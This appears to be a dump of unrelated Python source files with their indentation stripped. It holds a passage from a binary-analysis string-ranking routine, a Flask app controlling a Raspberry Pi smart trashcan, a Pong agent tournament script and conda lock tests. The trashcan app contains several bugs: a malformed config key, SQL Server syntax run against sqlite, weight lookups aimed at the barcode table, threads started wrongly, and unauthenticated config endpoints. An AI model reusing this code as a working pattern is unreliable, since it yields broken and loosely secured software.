scanline = scanline[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
## result is still empty, perhaps it is a module parameter. TODO
if len(res) == 0:
if '.' in line:
if line.count('.') == 1:
paramres = reparam.match(line)
if paramres != None:
pass
## if 'line' has been changed, then linecount should be changed accordingly
if line != origline:
linecount[origline] = linecount[origline] - 1
if line in linecount:
linecount[line] = linecount[line] + 1
else:
linecount[line] = 1
## nothing in the cache
if len(res) == 0:
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
lock.acquire()
unmatchedignorecache[line] = 1
lock.release()
continue
if len(res) != 0:
## Assume:
## * database has no duplicates
## * filenames in the database have been processed using os.path.basename()
if scandebug:
print >>sys.stderr, "\n%d matches found for <(|%s|)> in %s" % (len(res), line, filename)
pkgs = {} ## {package name: set([filenames without path])}
filenames = {}
## For each string determine in how many packages (without version) the string
## is found.
## If the string is only found in one package the string is unique to the package
## so record it as such and add its length to a score.
for result in res:
(package, sourcefilename) = result
if package in clones:
package = clones[package]
if not package in pkgs:
pkgs[package] = set([sourcefilename])
else:
pkgs[package].add(sourcefilename)
if not sourcefilename in filenames:
filenames[sourcefilename] = [package]
else:
filenames[sourcefilename] = list(set(filenames[sourcefilename] + [package]))
if len(pkgs) != 1:
nonUniqueMatchLines.append(line)
## The string found is not unique to a package, but is it
## unique to a filename?
## This method assumes that files that are named the same
## also contain the same or similar content. This could lead
## to incorrect results.
## now determine the score for the string
try:
score = len(line) / pow(alpha, (len(filenames) - 1))
except Exception, e:
## pow(alpha, (len(filenames) - 1)) is overflowing here
## so the score would be very close to 0. The largest value
## is sys.maxint, so use that one. The score will be
## smaller than almost any value of scorecutoff...
if usesourceorder:
score = len(line) / sys.maxint
else:
matchednonassigned = True
matchednonassignedlines += 1
linecount[line] = linecount[line] - 1
continue
## if it is assumed that the compiler puts string constants in the
## same order in the generated code then strings can be assigned
## to the package directly
if usesourceorder:
if uniquepackage_tmp in pkgs:
assign_string = False
assign_filename = None
for pf in uniquefilenames_tmp:
if pf in pkgs[uniquepackage_tmp]:
assign_string = True
assign_filename = pf
break
if assign_string:
if not nonUniqueMatches.has_key(uniquepackage_tmp):
nonUniqueMatches[uniquepackage_tmp] = [line]
else:
nonUniqueMatches[uniquepackage_tmp].append(line)
if directAssignedString.has_key(uniquepackage_tmp):
directAssignedString[uniquepackage_tmp].append((line, assign_filename, score))
else:
directAssignedString[uniquepackage_tmp] = [(line, assign_filename, score)]
matcheddirectassignedlines += 1
nonUniqueAssignments[uniquepackage_tmp] = nonUniqueAssignments.get(uniquepackage_tmp,0) + 1
matchedlines += 1
linecount[line] = linecount[line] - 1
continue
else:
## store pkgs and line for backward lookups
backlog.append((line, pkgs[uniquepackage_tmp], score))
if not score > scorecutoff:
matchednonassigned = True
matchednonassignedlines += 1
if not usesourceorder:
linecount[line] = linecount[line] - 1
continue
## After having computed a score determine if the files
## the string was found in in are all called the same.
## filenames {name of file: { name of package: 1} }
if filter(lambda x: len(filenames[x]) != 1, filenames.keys()) == []:
matchednotclonelines += 1
for fn in filenames:
## The filename fn containing the matched string can only
## be found in one package.
## For example: string 'foobar' is present in 'foo.c' in package 'foo'
## and 'bar.c' in package 'bar', but not in 'foo.c' in package 'bar'
## or 'bar.c' in foo (if any).
fnkey = filenames[fn][0]
nonUniqueScore[fnkey] = nonUniqueScore.get(fnkey,0) + score
matchednotclones = True
if not usesourceorder:
linecount[line] = linecount[line] - 1
notclones.append((line, filenames))
else:
notclonesbacklog.append((line, filenames))
continue
else:
for fn in filenames:
## There are multiple packages in which the same
## filename contains this string, for example 'foo.c'
## in packages 'foo' and 'bar. This is likely to be
## internal cloning in the repo. This string is
## assigned to a single package in the loop below.
## Some strings will not signficantly contribute to the score, so they
## could be ignored and not added to the list.
## For now exclude them, but in the future they could be included for
## completeness.
stringsLeft['%s\t%s' % (line, fn)] = {'string': line, 'score': score, 'filename': fn, 'pkgs' : filenames[fn]}
## lookup
else:
## the string is unique to this package and this package only
uniquematch = True
## store the uniqueMatches without any information about checksums
if not package in uniqueMatches:
uniqueMatches[package] = [(line, [])]
else:
uniqueMatches[package].append((line, []))
linecount[line] = linecount[line] - 1
if usesourceorder:
uniquepackage_tmp = package
uniquefilenames_tmp = pkgs[package]
## process backlog
for b in xrange(len(backlog), 0, -1):
assign_string = False
assign_filename = None
(backlogline, backlogfilenames, backlogscore) = backlog[b-1]
for pf in uniquefilenames_tmp:
if pf in backlogfilenames:
assign_string = True
assign_filename = pf
break
if assign_string:
## keep track of the old score in case it is changed/recomputed here
oldbacklogscore = backlogscore
if not nonUniqueMatches.has_key(uniquepackage_tmp):
nonUniqueMatches[uniquepackage_tmp] = [backlogline]
else:
nonUniqueMatches[uniquepackage_tmp].append(backlogline)
if directAssignedString.has_key(uniquepackage_tmp):
directAssignedString[uniquepackage_tmp].append((backlogline, assign_filename, backlogscore))
else:
directAssignedString[uniquepackage_tmp] = [(backlogline, assign_filename, backlogscore)]
matcheddirectassignedlines += 1
nonUniqueAssignments[uniquepackage_tmp] = nonUniqueAssignments.get(uniquepackage_tmp,0) + 1
## remove the directly assigned string from stringsLeft,
## at least for *this* package
try:
for pf in backlogfilenames:
del stringsLeft['%s\t%s' % (backlogline, pf)]
except KeyError, e:
pass
## decrease matchednonassigned if the originally computed score
## is too low
if not oldbacklogscore > scorecutoff:
matchednonassigned = matchednonassigned - 1
linecount[backlogline] = linecount[backlogline] - 1
for cl in notclonesbacklog:
(notclone, filenames) = cl
if notclone == backlogline:
matchednotclonelines -= 1
for fn in filenames:
fnkey = filenames[fn][0]
nonUniqueScore[fnkey] = nonUniqueScore.get(fnkey) - backlogscore
notclonesbacklog.remove(cl)
break
else:
break
## store notclones for later use
notclones += notclonesbacklog
backlog = []
notclonesbacklog = []
matched = True
## for statistics it's nice to see how many lines were matched
matchedlines += 1
## clean up stringsLeft first
for l in stringsLeft.keys():
if linecount[stringsLeft[l]['string']] == 0:
del stringsLeft[l]
## done looking up and assigning all the strings
uniqueScore = {}
for package in uniqueMatches:
if not package in uniqueScore:
uniqueScore[package] = 0
for line in uniqueMatches[package]:
uniqueScore[package] += len(line[0])
directAssignedScore = {}
for package in directAssignedString:
if not package in directAssignedScore:
directAssignedScore[package] = 0
for line in directAssignedString[package]:
directAssignedScore[package] += line[2]
## If the string is not unique, do a little bit more work to determine which
## file is the most likely, so also record the filename.
##
## 1. determine whether the string is unique to a package
## 2. if not, determine which filenames the string is in
## 3. for each filename, determine whether or not this file (containing the string)
## is unique to a package
## 4. if not, try to determine the most likely package the string was found in
## For each string that occurs in the same filename in multiple
## packages (e.g., "debugXML.c", a cloned file of libxml2 in several
## packages), assign it to one package. We do this by picking the
## package that would gain the highest score increment across all
## strings that are left. This is repeated until no strings are left.
pkgsScorePerString = {}
for stri in stringsLeft:
pkgsSortedTmp = map(lambda x: {'package': x, 'uniquescore': uniqueScore.get(x, 0)}, stringsLeft[stri]['pkgs'])
## get the unique score per package and sort in reverse order
pkgsSorted = sorted(pkgsSortedTmp, key=lambda x: x['uniquescore'], reverse=True)
## and get rid of the unique scores again. Now it's sorted.
pkgsSorted = map(lambda x: x['package'], pkgsSorted)
pkgs2 = []
for pkgSort in pkgsSorted:
if uniqueScore.get(pkgSort, 0) == uniqueScore.get(pkgsSorted[0], 0):
pkgs2.append(pkgSort)
pkgsScorePerString[stri] = pkgs2
newgain = {}
for stri in stringsLeft:
for p2 in pkgsScorePerString[stri]:
newgain[p2] = newgain.get(p2, 0) + stringsLeft[stri]['score']
useless_packages = set()
for p in newgain.keys():
## check if packages could ever contribute usefully.
if newgain[p] < gaincutoff:
useless_packages.add(p)
## walk through the data again, filter out useless stuff
new_stringsleft = {}
string_split = {}
for stri in stringsLeft:
## filter out the strings that only occur in packages that will contribute
## to the score. Ignore the rest.
if filter(lambda x: x not in useless_packages, pkgsScorePerString[stri]) != []:
new_stringsleft[stri] = stringsLeft[stri]
strsplit = stri.rsplit('\t', 1)[0]
if strsplit in string_split:
string_split[strsplit].add(stri)
else:
string_split[strsplit] = set([stri])
## the difference between stringsLeft and new_stringsleft is matched
## but unassigned if the strings *only* occur in stringsLeft
oldstrleft = set()
for i in stringsLeft:
oldstrleft.add(stringsLeft[i]['string'])
for i in oldstrleft.difference(set(string_split.keys())):
matchednonassignedlines += linecount[i]
matchedlines -= linecount[i]
stringsLeft = new_stringsleft
roundNr = 0
strleft = len(stringsLeft)
## keep track of which strings were already found. This is because each string
## is only considered once anyway.
while strleft > 0:
roundNr = roundNr + 1
#if scandebug:
# print >>sys.stderr, "\nround %d: %d strings left" % (roundNr, strleft)
gain = {}
stringsPerPkg = {}
## cleanup
if roundNr != 0:
todelete = set()
for stri in stringsLeft:
if linecount[stringsLeft[stri]['string']] == 0:
todelete.add(stri)
for a in todelete:
del stringsLeft[a]
oldstrleft = set()
for i in stringsLeft:
oldstrleft.add(stringsLeft[i]['string'])
## Determine to which packages the remaining strings belong.
newstrleft = set()
for stri in stringsLeft:
for p2 in pkgsScorePerString[stri]:
if p2 in useless_packages:
continue
gain[p2] = gain.get(p2, 0) + stringsLeft[stri]['score']
if not p2 in stringsPerPkg:
stringsPerPkg[p2] = []
stringsPerPkg[p2].append(stri)
newstrleft.add(stringsLeft[stri]['string'])
for i in oldstrleft.difference(newstrleft):
if linecount[i] == 0:
continue
matchednonassignedlines += 1
matchedlines -= 1
linecount[i] -= 1
for p2 in gain.keys():
## check if packages could ever contribute usefully.
if gain[p2] < gaincutoff:
useless_packages.add(p2)
## gain_sorted contains the sort order, gain contains the actual data
gain_sorted = sorted(gain, key = lambda x: gain.__getitem__(x), reverse=True)
if gain_sorted == []:
break
## so far value is the best, but that might change
best = gain_sorted[0]
## Possible optimisation: skip the last step if the gain is not high enough
if filter(lambda x: x[1] > gaincutoff, gain.items()) == []:
break
## if multiple packages have a big enough gain, add them to 'close'
## and 'fight' to see which package is the most likely hit.
close = filter(lambda x: gain[x] > (gain[best] * 0.9), gain_sorted)
## Let's hope "sort" terminates on a comparison function that
## may not actually be a proper ordering.
if len(close) > 1:
#if scandebug:
# print >>sys.stderr, " doing battle royale between", close
## reverse sort close, then best = close_sorted[0][0]
for c in close:
if avgscores[language].get(c) is None:
avgscores[language][c] = 0
close_sorted = map(lambda x: (x, avgscores[language][x]), close)
close_sorted = sorted(close_sorted, key = lambda x: x[1], reverse=True)
## If we don't have a unique score *at all* it is likely that everything
## is cloned. There could be a few reasons:
## 1. there are duplicates in the database due to renaming
## 2. package A is completely contained in package B (bundling).
## If there are no hits for package B, it is more likely we are
## actually seeing package A.
if uniqueScore == {}:
best = close_sorted[-1][0]
else:
best = close_sorted[0][0]
#if scandebug:
# print >>sys.stderr, " %s won" % best
best_score = 0
## for each string in the package with the best gain add the score
## to the package and move on to the next package.
todelete = set()
for xy in stringsPerPkg[best]:
x = stringsLeft[xy]
strsplit = xy.rsplit('\t', 1)[0]
if linecount[strsplit] == 0:
## is this correct here? There are situations where one
## string appears multiple times in a single source file
## and also the binary (eapol_sm.c in hostapd 0.3.9 contains
## the string "%s state=%s" several times and binaries
## do too.
todelete.add(strsplit)
continue
sameFileScore[best] = sameFileScore.get(best, 0) + x['score']
best_score += 1
linecount[strsplit] = linecount[strsplit] - 1
if best in nonUniqueMatches:
nonUniqueMatches[best].append(strsplit)
else:
nonUniqueMatches[best] = [strsplit]
for a in todelete:
for st in string_split[a]:
del stringsLeft[st]
## store how many non unique strings were assigned per package
nonUniqueAssignments[best] = nonUniqueAssignments.get(best,0) + best_score
if gain[best] < gaincutoff:
break
strleft = len(stringsLeft)
for i in stringsLeft:
strsplit = i.rsplit('\t', 1)[0]
if linecount[strsplit] == 0:
continue
matchednonassignedlines += 1
matchedlines -= 1
linecount[strsplit] -= 1
scores = {}
for k in set(uniqueScore.keys() + sameFileScore.keys()):
scores[k] = uniqueScore.get(k, 0) + sameFileScore.get(k, 0) + nonUniqueScore.get(k,0) + directAssignedScore.get(k,0)
scores_sorted = sorted(scores, key = lambda x: scores.__getitem__(x), reverse=True)
rank = 1
reports = []
if scores == {}:
totalscore = 0.0
else:
totalscore = float(reduce(lambda x, y: x + y, scores.values()))
for s in scores_sorted:
try:
percentage = (scores[s]/totalscore)*100.0
except:
percentage = 0.0
reports.append({'rank': rank, 'package': s, 'unique': uniqueMatches.get(s,[]), 'uniquematcheslen': len(uniqueMatches.get(s,[])), 'percentage': percentage, 'packageversions': packageversions.get(s, {}), 'packagelicenses': packagelicenses.get(s, []), 'packagecopyrights': packagecopyrights.get(s,[])})
rank = rank+1
if matchedlines == 0 and unmatched == []:
res = None
else:
if scankernelfunctions:
matchedlines = matchedlines - len(kernelfuncres)
lenlines = lenlines - len(kernelfuncres)
ignored = list(set(ignored))
ignored.sort()
res = {'matchedlines': matchedlines, 'extractedlines': lenlines, 'reports': reports, 'nonUniqueMatches': nonUniqueMatches, 'nonUniqueAssignments': nonUniqueAssignments, 'unmatched': unmatched, 'scores': scores, 'unmatchedlines': unmatchedlines, 'matchednonassignedlines': matchednonassignedlines, 'matchednotclonelines': matchednotclonelines, 'matcheddirectassignedlines': matcheddirectassignedlines, 'ignored': list(set(ignored))}
else:
res = None
## then look up results for function names, variable names, and so on.
if language == 'C':
if linuxkernel:
functionRes = {}
if 'BAT_KERNELSYMBOL_SCAN' in scanenv:
namekernelquery = "select distinct package from linuxkernelnamecache where varname=%s"
variablepvs = scankernelsymbols(leafreports['identifier']['kernelsymbols'], scanenv, namekernelquery, cursor, conn, clones)
## TODO: clean up
if leafreports['identifier'].has_key('kernelfunctions'):
if leafreports['identifier']['kernelfunctions'] != []:
functionRes['kernelfunctions'] = copy.deepcopy(leafreports['identifier']['kernelfunctions'])
else:
(functionRes, variablepvs) = scanDynamic(leafreports['identifier']['functionnames'], leafreports['identifier']['variablenames'], scanenv, cursor, conn, clones)
elif language == 'Java':
if not ('BAT_CLASSNAME_SCAN' in scanenv or 'BAT_FIELDNAME_SCAN' in scanenv or 'BAT_METHOD_SCAN' in scanenv):
variablepvs = {}
functionRes = {}
else:
(functionRes, variablepvs) = extractJava(leafreports['identifier'], scanenv, cursor, conn, clones)
else:
variablepvs = {}
functionRes = {}
## then write results back to disk. This needs to be done because results for
## Java might need to be aggregated first.
leafreports['ranking'] = (res, functionRes, variablepvs, language)
leafreports['tags'].append('ranking')
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
leafreports = cPickle.dump(leafreports, leaf_file)
leaf_file.close()
reportqueue.put(filehash)
scanqueue.task_done()
def licensesetup(scanenv, cursor, conn, debug=False):
if cursor == None:
return (False, {})
cursor.execute("select table_name from information_schema.tables where table_type='BASE TABLE' and table_schema='public'")
tablenames = map(lambda x: x[0], cursor.fetchall())
conn.commit()
## Now verify the names of the tables
newenv = copy.deepcopy(scanenv)
supported_languages = set()
## for Java
if 'stringscache_java' in tablenames:
supported_languages.add('Java')
else:
if 'Java' in supported_languages:
a.remove('Java')
if 'Java' in supported_languages:
if 'classcache_java' in tablenames:
newenv['BAT_CLASSNAME_SCAN'] = 1
else:
if 'BAT_CLASSNAME_SCAN' in newenv:
del newenv['BAT_CLASSNAME_SCAN']
if 'fieldcache_java' in tablenames:
newenv['BAT_FIELDNAME_SCAN'] = 1
else:
if 'BAT_FIELDNAME_SCAN' in newenv:
del newenv['BAT_FIELDNAME_SCAN']
if 'functionnamecache_java' in tablenames:
newenv['BAT_METHOD_SCAN'] = 1
else:
if 'BAT_METHOD_SCAN' in newenv:
del newenv['BAT_METHOD_SCAN']
## for C
if 'stringscache_c' in tablenames:
supported_languages.add('C')
else:
if 'C' in supported_languages:
a.remove('C')
if 'C' in supported_languages:
if 'varnamecache_c' in tablenames:
newenv['BAT_VARNAME_SCAN'] = 1
if 'functionnamecache_c' in tablenames:
newenv['BAT_FUNCTION_SCAN'] = 1
## for Linux kernel
if 'linuxkernelnamecache' in tablenames:
newenv['BAT_KERNELSYMBOL_SCAN'] = 1
if 'linuxkernelfunctionnamecache' in tablenames:
newenv['BAT_KERNELFUNCTION_SCAN'] = 1
if 'renames' in tablenames:
newenv['HAVE_CLONE_DB'] = 1
supported_languages = list(supported_languages)
newenv['supported_languages'] = supported_languages
return (True, newenv)
|
app.py
|
import sqlite3
import json
import datetime
import logging
import requests
import uuid
import RPi.GPIO as GPIO
from time import sleep
from threading import Thread
from flask_apscheduler import APScheduler
from flask import Flask, request, g, Response
from flask_restful import Resource, Api
from gpiozero import Button, OutputDevice
from hx711 import HX711
import config
import bc_scanner
import sch
# Setup scale amp
hx711 = HX711(
dout_pin=config.conf['SCALE_DATA_PIN'],
pd_sck_pin=config.conf['SCALE_CLOCK_PIN'],
channel=config.conf['SCALE_CHANNEL'],
gain=config.conf['SCALE_GAIN']
)
#Create objects for physical objects
lid_switch = Button(config.conf['LID_SWITCH_PIN)'])
lid_open_button = OutputDevice(config.conf['LID_OPEN_PIN'], active_high=False, initial_value=False)
lid_close_button = OutputDevice(config.conf['LID_CLOSE_PIN'], active_high=False, initial_value=False)
light = OutputDevice(config.conf['LIGHT_PIN'], active_high=False, initial_value=False)
fan = OutputDevice(config.conf['FAN_PIN'], active_high=False, initial_value=False)
led = OutputDevice(config.conf['LED_PIN'], active_high=False, initial_value=False)
#Setup parser
#Setup database
DATABASE = '/srv/trashcan/venv/database/database.db'
# Shared app context
app = Flask(__name__)
scheduler = APScheduler()
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
def update_status():
payload = {
'lid' : lid_switch.value,
'light' : light.value,
'fan' : fan.value,
'led' : led.value
}
try:
requests.post(config.conf['HOME_SERVER_URL'] + '/update_status', params = payload, timeout=0.2)
except requests.exceptions as e:
logging.warning('Update status failed')
def start_api():
# Config API
my_api = Api(app)
my_api.add_resource(Index, '/')
my_api.add_resource(ApiRoot, '/api')
my_api.add_resource(Lid, '/api/lid')
my_api.add_resource(Scale, '/api/scale')
my_api.add_resource(Light, '/api/light')
my_api.add_resource(Fan, '/api/fan')
my_api.add_resource(BarcodeList, '/api/barcode')
my_api.add_resource(WeightList, '/api/weight')
my_api.add_resource(Barcode, '/api/barcode/<barcode_id>')
my_api.add_resource(Weight, '/api/weight/<weight_id>')
my_api.add_resource(ConfigList, 'api/config')
my_api.add_resource(ConfigItem, 'api/config/<option_name>')
# Config scheduler
app.config.from_object(sch.Config())
scheduler.init_app(app)
scheduler.start()
app.run()
# Watchdog to monitor db config table for changes
def start_change_monitor():
change_id = config.get_last_change_id()
while True:
new_conf_id = config.get_last_change_id()
if new_conf_id > change_id:
config.load_config()
change_id = new_conf_id
# Restart scheduler with new values
scheduler.shutdown()
scheduler.start()
sleep(config['WATCHDOG_SLEEP_TIMER'])
# Pauses any jobs for lights and/or fan and starts up barcode scanner
def start_lid_monitor():
state = False
while True:
#If lid is open, pause job processing, start the scanner and read
while lid_switch.value:
if not state:
state = True
logging.debug('Lid open')
update_status()
scheduler.pause()
upc = bc_scanner.read()
#Uploads return from read if not empty
if upc:
bc_scanner.upload(upc)
sleep(0.1)
#If lid was just closed, resume processing jobs, stop scanner, and upload a scale reading
if state:
state = False
logging.debug('Lid closed')
update_status()
scheduler.resume()
#Get weight from scale
r = requests.get('http://127.0.0.1/api/scale')
uuid.uuid1()
requests.post('http://127.0.0.1/api/weight/'+str(uuid.uuid1())+'?weight_raw='+r.text)
sleep(0.1)
def toggle_led(action):
if config.conf['CLEANING_LED'] == 'true':
if action == 'off':
led.off()
elif action == 'on':
led.on()
else:
led.toggle()
update_status()
class Index (Resource):
def get(self):
content = "<h1>This is an index page</h1>"
return content
class ApiRoot(Resource):
def get(self):
content = "<h1>This is an API page</h1>"
return content
class Lid(Resource):
def get(self):
return lid_switch.value
def put(self):
action = request.args.get('action')
if action == 'close':
lid_close_button.on()
logging.info('Lid closed')
elif action == 'open':
lid_open_button.on()
logging.info('Lid opened')
elif action == 'toggle':
if lid_switch.value:
lid_close_button.on()
logging.info('Lid closed')
else:
lid_open_button.on()
logging.info('Lid opened')
else:
return Response('Invalid action parameter',status=400)
update_status()
return 'Success'
class Light(Resource):
def get(self):
return light.value
def put(self):
action = request.args.get('action')
if action == 'off':
light.off()
toggle_led('off')
elif action == 'on':
light.on()
toggle_led('on')
elif action == 'toggle':
light.toggle()
toggle_led()
else:
return Response('Invalid action parameter',status=400)
update_status()
return 'Success'
class Fan(Resource):
def get(self):
return fan.value
def put(self):
action = request.args.get('action')
if action == 'off':
fan.off()
toggle_led('off')
elif action == 'on':
fan.on()
toggle_led('on')
elif action == 'toggle':
fan.toggle()
toggle_led()
else:
return 400
update_status()
return 'Success'
class Scale (Resource):
def get(self):
GPIO.setwarnings(False)
offset = 30500
gain = 0.0095
hx711.reset() #Maybe not necessary
raw_measures = hx711.get_raw_data(config.conf['NUM_MEASUREMENTS'])
#Apply offset
measures = [x + offset for x in raw_measures]
measures.sort()
#Calculate median
median = measures[int(round((len(measures) / 2)))]
#Remove values outside +/- 25% from the median
results = [x for x in measures if median * 0.75 <= x <= median * 1.25]
#0 out and average values. Should be ~1000 after applying offset. Remove this before applying gain.
x = (sum(results)/len(results))- 1000
#Apply gain and remove tare value.
return (x*gain) - config.conf['TARE']
def put(self):
hx711.reset() # Maybe not necessary
config.set_config('TARE', hx711.get_raw_data(config.conf['NUM_MEASUREMENTS']))
return 'Success'
class WeightList (Resource):
def get(self):
conn = get_db()
conn.cursor().execute("SELECT * FROM[Weight]")
results = conn.cursor().fetchall()
return json.dumps(results)
def delete(self):
return 501
class BarcodeList (Resource):
def get(self):
conn = get_db()
conn.cursor().execute("SELECT * FROM[Barcode]")
results = conn.cursor().fetchall()
return json.dumps(results)
def delete(self):
return 501
class Barcode (Resource):
def post(self,barcode_id):
conn = get_db()
time = datetime.datetime.now()
barcode = request.args.get('barcode')
conn.cursor().execute("INSERT INTO Barcode ([barcode_id],[timestamp],[barcode]) VALUES(?, ?, ?)",(barcode_id,time,barcode,))
conn.commit()
return barcode_id
def delete(self, barcode_id):
conn = get_db()
result = conn.cursor().execute("DELETE FROM [Barcode] WHERE barcode_id = ?",(barcode_id,))
conn.commit()
return result
def get(self,barcode_id):
conn = get_db()
result = conn.cursor().execute("SELECT TOP 1 FROM [Barcode] WHERE barcode_id = ?", (barcode_id,))
return result
class Weight (Resource):
def post(self,weight_id):
conn = get_db()
time = datetime.datetime.now()
weight_raw = request.args.get('weight_raw')
if request.args.get('weight'):
weight = request.args.get('weight')
else:
weight = weight_raw * config.conf['CONVERSION_FACTOR']
conn.cursor().execute("INSERT INTO Weight ([weight_id],[timestamp],[weight],[weight_raw]) VALUES(?, ?, ?,?)",
(weight_id,time,weight,weight_raw))
conn.commit()
return weight_id
def delete(self, weight_id):
conn = get_db()
result = conn.cursor().execute("DELETE FROM[Weight] WHERE weight_id = ?",(weight_id,))
conn.commit()
return result
def get(self,weight_id):
conn = get_db()
result = conn.cursor().execute("SELECT TOP 1 FROM [Barcode] WHERE weight_id = ?", (weight_id,))
return result
class ConfigList (Resource):
def get(self):
return config.get_config()
class ConfigItem (Resource):
def get(self, option_name):
return config.get_config(option_name)
def put(self, option_name):
value = request.args.get('value')
config.set_config(option_name, value)
def post(self, option_name):
value = request.args.get('value')
config.set_config(option_name, value)
def delete(self, option_name):
config.delete_config(option_name)
if __name__ == '__main__':
t1 = Thread(target = start_api())
t2 = Thread(target = start_change_monitor())
t3 = Thread(target = start_lid_monitor())
t1.start()
t2.start()
t3.start()
|
epic_battle_royale.py
|
import argparse
import sys
import os
from pong_testbench import PongTestbench
from multiprocessing import Process, Queue
from matplotlib import font_manager
from time import sleep
import importlib
import numpy as np
parser = argparse.ArgumentParser()
parser.add_argument("dir", type=str, help="Directory with agents.")
parser.add_argument("--render", "-r", action="store_true", help="Render the competition.")
parser.add_argument("--games", "-g", type=int, default=100, help="Number of games.")
parser.add_argument("--max_proc", "-p", type=int, default=4, help="Max number of processes.")
args = parser.parse_args()
def run_test(id1, agent1_dir, id2, agent2_dir, queue, games, render):
sys.path.insert(0, agent1_dir)
orig_wd = os.getcwd()
import agent
os.chdir(agent1_dir)
agent1 = agent.Agent()
agent1.load_model()
os.chdir(orig_wd)
del sys.path[0]
sys.path.insert(0, agent2_dir)
importlib.reload(agent)
os.chdir(agent2_dir)
agent2 = agent.Agent()
agent2.load_model()
os.chdir(orig_wd)
del sys.path[0]
testbench = PongTestbench(render)
testbench.init_players(agent1, agent2)
testbench.run_test(games)
wins1, games = testbench.get_agent_score(agent1)
wins2, games = testbench.get_agent_score(agent2)
name1 = agent1.get_name()
name2 = agent2.get_name()
queue.put((id1, id2, wins1, wins2, name1, name2, games))
def get_directories(top_dir):
subdir_list = []
subdir_gen = os.walk(top_dir)
for dir, subdirs, files in subdir_gen:
if "__pycache__" in dir:
continue
if "agent.py" not in files:
print("Warn: No agent.py found in %s. Skipping." % dir)
continue
subdir_list.append(dir)
print("%s added to directory list." % dir)
return subdir_list
def epic_battle_royale(top_dir, max_proc=4):
directories = get_directories(top_dir)
names = ["__unknown__"] * len(directories)
procs = []
result_queue = Queue()
print("Finished scanning for agents; found:", len(directories))
for i1, d1 in enumerate(directories):
for i2, d2 in enumerate(directories):
if i1 == i2:
continue
pargs = (i1, d1, i2, d2, result_queue, args.games, args.render)
proc = Process(target=run_test, args=pargs)
procs.append(proc)
print("Living procs:", sum(p.is_alive() for p in procs))
while sum(p.is_alive() for p in procs) >= max_proc:
sleep(0.3)
print("Starting process")
proc.start()
sleep(1)
for p in procs:
p.join()
# Fetch all results from the queue
no_agents = len(directories)
games_won = np.zeros((no_agents, no_agents), dtype=np.int32)
while result_queue.qsize() > 0:
id1, id2, wins1, wins2, name1, name2, games = result_queue.get()
if wins1 + wins2 != games:
print("Woops, wins dont sum up.")
games_won[id1, id2] += wins1
games_won[id2, id1] += wins2
names[id1] = name1
names[id2] = name2
np.save("brres", games_won)
# Format: Wins of ROW versus COLUMN
np.savetxt("battle_royale_results.txt", games_won, fmt="%d")
np.savetxt("battle_royale_players.txt", directories, fmt="%s")
# Sum across columns to get total wins of each agent
total_wins = games_won.sum(axis=1)
# And across rows to get total losses.
total_losses = games_won.sum(axis=0)
agent_wins = list(zip(total_wins, total_losses, names, directories))
agent_wins.sort(key=lambda x: -x[0])
resfile = open("leaderboard.txt", "w")
print("")
print("-"*80)
print("--- LEADERBOARD ---")
for i, (wins, losses, name, dir) in enumerate(agent_wins):
line = "%d. %s with %d wins (winrate %.2f%%) (from %s)" % (i+1, name, wins, wins/(wins+losses)*100, dir)
resfile.write(line+"\n")
print(line)
resfile.close()
print("-"*80)
print("")
print("Finished!")
if __name__ == "__main__":
epic_battle_royale(args.dir, args.max_proc)
|
test_lock.py
|
import pytest
from conda.lock import DirectoryLock, FileLock, LockError
from os.path import basename, exists, isfile, join
def test_filelock_passes(tmpdir):
"""
Normal test on file lock
"""
package_name = "conda_file1"
tmpfile = join(tmpdir.strpath, package_name)
with FileLock(tmpfile) as lock:
path = basename(lock.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_filelock_locks(tmpdir):
"""
Test on file lock, multiple lock on same file
Lock error should raised
"""
package_name = "conda_file_2"
tmpfile = join(tmpdir.strpath, package_name)
with FileLock(tmpfile) as lock1:
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists()
with pytest.raises(LockError) as execinfo:
with FileLock(tmpfile, retries=1) as lock2:
assert False # this should never happen
assert lock2.path_to_lock == lock1.path_to_lock
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_folder_locks(tmpdir):
"""
Test on Directory lock
"""
package_name = "dir_1"
tmpfile = join(tmpdir.strpath, package_name)
with DirectoryLock(tmpfile) as lock1:
assert exists(lock1.lock_file_path) and isfile(lock1.lock_file_path)
with pytest.raises(LockError) as execinfo:
with DirectoryLock(tmpfile, retries=1) as lock2:
assert False # this should never happen
assert exists(lock1.lock_file_path) and isfile(lock1.lock_file_path)
# lock should clean up after itself
assert not exists(lock1.lock_file_path)
def test_lock_thread(tmpdir):
"""
2 thread want to lock a file
One thread will have LockError Raised
"""
def lock_thread(tmpdir, file_path):
with FileLock(file_path) as lock1:
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
assert not tmpdir.join(path).exists()
from threading import Thread
package_name = "conda_file_3"
tmpfile = join(tmpdir.strpath, package_name)
t = Thread(target=lock_thread, args=(tmpdir, tmpfile))
with FileLock(tmpfile) as lock1:
t.start()
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
t.join()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_lock_retries(tmpdir):
"""
2 thread want to lock a same file
Lock has zero retries
One thread will have LockError raised
"""
def lock_thread_retries(tmpdir, file_path):
with pytest.raises(LockError) as execinfo:
with FileLock(file_path, retries=0):
assert False # should never enter here, since max_tires is 0
assert "LOCKERROR" in str(execinfo.value)
from threading import Thread
package_name = "conda_file_3"
tmpfile = join(tmpdir.strpath, package_name)
t = Thread(target=lock_thread_retries, args=(tmpdir, tmpfile))
with FileLock(tmpfile) as lock1:
t.start()
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
t.join()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_permission_file():
"""
Test when lock cannot be created due to permission
Make sure no exception raised
"""
